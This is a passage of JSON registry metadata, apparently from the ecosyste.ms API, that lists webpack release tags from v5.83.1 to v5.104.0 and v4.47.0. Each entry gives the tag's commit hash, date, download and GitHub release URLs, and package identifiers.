mit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"